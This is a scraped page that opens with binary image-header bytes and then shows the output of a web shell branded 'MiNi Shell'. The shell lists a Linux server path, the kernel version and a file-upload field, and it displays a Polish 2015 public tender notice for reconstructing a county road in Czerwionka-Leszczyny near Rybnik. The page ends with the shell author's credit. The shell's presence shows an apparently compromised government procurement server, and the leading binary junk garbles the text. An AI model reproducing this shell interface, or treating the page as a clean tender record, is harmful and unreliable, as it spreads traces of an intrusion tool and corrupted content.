JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150611/140250-N-2015.html

<p class="kh_header"><b>Rybnik: Przebudowa drogi powiatowej 5625S ulicy Armii Krajowej w Czerwionce Leszczynach.</b><br>
<b>Numer ogłoszenia: 140250 - 2015; data zamieszczenia: 11.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jankowicka 49, 44-200 Rybnik, woj. śląskie, tel. 32 4227478, 4227874, faks 32 4227479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatrybnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej 5625S ulicy Armii Krajowej w Czerwionce Leszczynach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zadanie p.n. : Przebudowa drogi powiatowej 5625S ulicy Armii Krajowej w Czerwionce Leszczynach. Zakres prac obejmuje odcinek od km 0+000  do km 2+371,1 polegający na wykonaniu remontu nawierzchni jezdni na całej długości drogi tj. 2371,1 m, wykonaniu remontu chodnika o długości 880 m, wykonaniu poszerzenia jezdni na długości 1491m.

Zakres rzeczowy obejmuje m.in.:

Roboty rozbiórkowe i przygotowawcze, w tym m.in:
- rozebranie nawierzchni zjazdów i chodników z kostki betonowej z odwozem gruzu                     -           83,00 m2
- mechaniczne rozebranie chodników o nawierzchni bitumicznej grub. 6 cm  z odwozem gruzu    -         983,00 m2
- mechaniczne rozebranie podbudowy z kruszywa kamiennego grub. 15 cm  z odwozem gruzu   -        1066,00 m2
- rozebranie krawężników betonowych na podsypce cementowo - piaskowej                                -        2360,00 m
- demontaż wpustów ulicznych wraz z zasypaniem studzienek piaskiem stabilizowanym cementem 
  i odwozem materiałów z rozbiórki                                                                                                   -            15 szt.

Roboty ziemne
- roboty ziemne wykonywane koparkami w gruncie kat. IV ( w tym 50% robót wyk. ręcznie)
  z transportem  urobku na odl. 15 km                                                                                               -  2382 m3
- ręczne formowanie nasypów z piasku dowiezionego samochodami samowyładowczymi             -    589  m3
   

Odwodnienie korpusu drogowego, w tym m.in.
- wymiana przepustu śred. 300 mm wraz ze ściankami czołowymi i fundamentem                          -      25 m                                                                                          
- wymiana przepustu śred. 400 mm wraz ze ściankami czołowymi i fundamentem                          -      98 m                                                                                          
- wymiana przepustu śred. 500 mm wraz ze ściankami czołowymi i fundamentem                          -      74 m                                                                                          
- wymiana przepustu śred. 800 mm wraz ze ściankami czołowymi i fundamentem                          -        5 m                                                                                          

Podbudowy, w tym m.in.:
- profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni                                     -  4789,00 m2
- podbudowa z kruszywa łamanego o grub.  25 cm 0-63mm  o grub. 25 cm                                          -  2911,00 m2
 - podbudowa z kruszywa łamanego 0-31,5mm o grub. 20 cm  na chodnikach                                      -  1496,00 m2
- podbudowa z kruszywa łamanego 0-31,5mm o grub. 20 cm  na zjazdach                                           -     77,00 m2
- podbudowa z dowiezionego gruntu stabilizowanego cementem klasy Rm 2,5 MPa o grub. 15 cm      -    3216,00 m2
- oczyszczenie nawierzchni drogowych nieulepszonych                                                                         -   2911,00 m2
- skropienie asfaltem nawierzchni drogowych                                                                                         -   2911,00 m2  
- podbudowa z betonu asfaltowego AC 22P - grub. w-wy po zagęszczeniu 8 cm                                  -   2402,00 m2

Jezdnia , w tym:
- frezowanie nawierzchni asfaltowych na zimno , grub. w-wy 3 cm                                                        -      905,00 m2
- frezowanie nawierzchni asfaltowych na zimno , grub. w-wy 6 cm                                                        - 15 106,00 m2
- zabezpieczenie geosiatką  nawierzchni przed spękaniami                                                                  -    1 450,00 m2 
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min. asfaltową                                      -       450,00 m2    
- mechaniczne oczyszczenie  nawierzchni                                                                                            -   17 838,00 m2
- skropienie nawierzchni emulsją asfaltową                                                                                           -   17 838,00 m2                                             - wykonanie warstwy wiążącej z betonu asfaltowego AC 16W o grub. 5 cm                                         -   18 580,00 m2    
- mechaniczne oczyszczenie  nawierzchni                                                                                            -    17 675,00 m2
- skropienie nawierzchni emulsją asfaltową                                                                                           -    17 675,00 m2                                             
 - warstwa ścieralna z betonu asfaltowego AC 11S o grub. 5 cm                                                          -    18 313,00 m2      

Nawierzchnie z kostki brukowej , w tym:
- nawierzchnie z brukowej kostki betonowej grub. 8 cm czerwonej ,na zjazdach w ciągu chodnika       -        77,00 m2                                                      - nawierzchnie z brukowej kostki betonowej grub. 8 cm szarej z dodatkiem grafitowej wzdłuż obrzeża 
  i krawężnika (po 20 cm  szerokości ) na chodniku                                                                                 -   1 496,00 m2  
- regulacja wysokościowa nawierzchni z kostki betonowej brukowej   (udział 30% kostki nowej)              -     499,00 m2
                     
Krawężniki, obrzeża, w tym:
- ułożenie krawężnika kamiennego o wym. 15x30 cm z wykonaniem ław na podsypce cem.-piaskowej     - 1 130,00 m
- ułożenie krawężników kamiennych  o wym. 15x22 cm z wykonaniem ław na podsypce 
  cementowo - piaskowej                                                                                                                               -     48,00 m
- ułożenie krawężników kamiennych o wym. w przekroju 15x30cm z wykonaniem ław betonowych na podsypce
  cementowo - piaskowej                                                                                                                                -    240,00 m
- ułożenie obrzeży betonowych o wym. 30x8 cm z wykonaniem ław betonowych na podsypce
  cementowo - piaskowej                                                                                                                                 - 1 020,00 m

Pobocza, rowy
- utwardzenie poboczy tłuczniem kamiennym grub. po zagęszczeniu 10 cm                                               -  1552,00 m2
- ułożenie ścieku prefabrykowanego głęb. 25cm                                                                                           -    254,00 m
- plantowanie, humusowanie z obsianiem skarp trawą                                                                                  -  7700,00 m2

 Inne roboty
- regulacja pionowa studzienek urządzeń podziemnych                                                                                -     55 szt.

Powyższe zapisy wyszczególniają ważniejsze pozycje występujące w projekcie , opisane w wersji skróconej, celem orientacji   co do  zakresu   robót. 
Opis ten nie powiela przedmiaru robót  w pełnym zakresie (nie zawiera 100% pozycji przedmiaru), ani nie uwzględnia  pełnego zakresu prac przewidzianego projektem.  
Szczegóły dotyczące opisu przedmiotu zamówienia , zakresu oraz technologii wykonania i odbioru robót zawierają: projekt budowlano- wykonawczy wraz  Specyfikacjami   Technicznymi Wykonania i Odbioru  Robót a także  przedmiar robót ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.10.00-8, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 130.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości : 32 000,00  złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku  w  tym zakresie. Wykonawca potwierdza spełnianie warunku 
   poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu. ( wg zał. Nr 3 );</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert  w   postępowaniu, a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie  wykonał  co najmniej: 

-  dwa  zamówienia  polegające na budowie, przebudowie lub remoncie  drogi  o nawierzchni bitumicznej wraz 
    z infrastrukturą  drogową  o wartości co najmniej 2 500 000,00 złotych brutto każde ;

Uznanie wykonanych robót uwarunkowane jest przedstawieniem  dowodów  potwierdzających , że roboty  te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż złoty polski, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP ogłoszony i obowiązujący w dniu opublikowania ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku  poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu ( wg zał. Nr 3 );</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku , jeżeli Wykonawca wykaże , że ma do dyspozycji (jako kierownika budowy) osobę  o pełnienia funkcji kierownika robót odpowiedzialną za kierowanie  robotami  budowlanymi , posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności drogowej bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2013 r. poz. 1409  z późn. zmianami) lub równoważne wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający wymaga również , aby osoba wskazana do kierowania robotami brała udział    w realizacji co najmniej jednego zakończonego zadania obejmującego budowę, przebudowę lub remont  drogi  o nawierzchni bitumicznej wraz z infrastrukturą   drogową  o wartości co  najmniej 2 500 000,00 złotych brutto.

Jeżeli Wykonawca wskaże osobę, która ma miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, musi wykazać, że osoba ta legitymuje się kwalifikacjami odpowiadającymi wymaganym uprawnieniom w kraju zamieszkania, jeśli takie w tym kraju obowiązują, z uwzględnieniem prawa do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63, poz. 394 z późn. zm.) oraz w ustawie z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U.             z 2013 r. poz. 932, z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku  poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu ( wg zał. Nr 3 );</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Pełnomocnictwo (jeżeli wykonawcę reprezentuje pełnomocnik lub gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia).
o ile prawo do po</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony mają prawo do przedłużenia terminu zakończenia robót o okres trwania przyczyn, z  powodu których będzie 
      zagrożone dotrzymanie terminu zakończenia robót, w następujących  sytuacjach:
a)  jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem 
      okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego 
      przekazania terenu budowy, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności 
      miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót,

b)  gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności
     z powodu  technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej konkretnych 
     warunków  atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, 
     za które Wykonawca  ponosi odpowiedzialność,

c)  gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu 
     Umowy ze  względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub 
     opóźniają realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle 
     prowadzonymi przez inne  podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,

d) wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji 
     państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, 

e)  gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są 
     zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa,
     w którym  ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi 
     odpowiedzialność,

f)  jeżeli wystąpi brak możliwości wykonywania robót z powodu  nie dopuszczania do ich wykonywania przez 
     uprawniony organ  lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,

g) wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.

2.  Wykonawca  jest uprawniony do żądania zmiany Umowy w zakresie materiałów, parametrów  technicznych, 
      technologii  wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu  Umowy w następujących 
      sytuacjach: 
a)	konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
b)	konieczności realizacji robót wynikających z wprowadzenia w Dokumentacji projektowej zmian uznanych                          za nieistotne odstępstwo od projektu budowlanego, wynikających z art. 36a ust. 1 Prawa Budowlanego,
c)	wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
d)	wystąpienia warunków Terenu budowy odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,
e)	konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
f)	wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,
g)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.

3.     Zmiany dokonywane są poprzez złożenie wniosku o zmianę w formie pisemnej przez jedną ze stron wraz
         z określeniem  zmiany, podaniem uzasadnienia, czasu wykonania zmiany.

4.    Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy
        w formie  pisemnej w drodze aneksu do Umowy, pod rygorem nieważności,.

5.     W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:
a)	danych teleadresowych, 
b)	danych rejestrowych,
c)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.

6. Strony umowy zawierają stosowny aneks w celu dokonania zmian w  umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatrybnicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd  Dróg Powiatowych , 44-200 Rybnik ul. Jankowicka 49,  pokój 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2015 godzina 08:45, miejsce: Zarząd  Dróg Powiatowych , 44-200 Rybnik ul. Jankowicka 49,  pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com